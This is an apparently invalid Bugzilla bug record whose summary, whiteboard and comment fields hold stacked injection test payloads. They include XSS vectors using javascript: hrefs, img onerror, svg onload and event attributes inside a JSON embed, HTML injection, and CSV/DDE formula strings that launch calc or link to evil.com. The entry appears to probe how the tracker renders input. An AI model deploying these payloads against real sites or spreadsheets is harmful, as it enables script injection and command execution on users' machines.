Closed Bug 1568431 Opened 6 years ago Closed 6 years ago

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

Categories

(Invalid Bugs :: General, enhancement)

enhancement
Not set
normal

Tracking

(Not tracked)

RESOLVED INVALID

People

(Reporter: what3verbugcrowd, Unassigned)

Details

(Whiteboard: ":";-3+3+cmd|' /C calc'!D2)

Summary: ":";-3+3+cmd|' /C calc'!D2 → =1+1
Summary: =1+1 → ":";-3+3+cmd|' /C calc'!D2
Summary: ":";-3+3+cmd|' /C calc'!D2 → =HYPERLINK("http://evil.com", "EVIL")
Whiteboard: ":";-3+3+cmd|' /C calc'!D2

=HYPERLINK("http://evil.com", "EVIL")

[{"insert":"\n"},{"insert":{"embed-external":{"data":{"type":"link","url":"http://localhost","name":"name","body":"body","photoUrl":"photourl'onerror=alert(1) '","timestamp":"time"onmouseover=alert(2) "","humanTime":"humentime"}}}}]

<img src=x onerror=alert(0);>

"><img src=x onerror="alert(document.domain)">

<svg><animate xlink:href=#x attributeName=href values=https://google.com /><a id=x><rect width=100 height=100 /></a>

<marquee behavior="scroll" direction="left">HTML_Injection</marquee>

Summary: =HYPERLINK("http://evil.com", "EVIL") → <svg/onload = alert(1);>
Summary: <svg/onload = alert(1);> → <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Component: Untriaged → General
Product: Thunderbird → Invalid Bugs
Resolution: --- → INVALID
Version: 5.0 → unspecified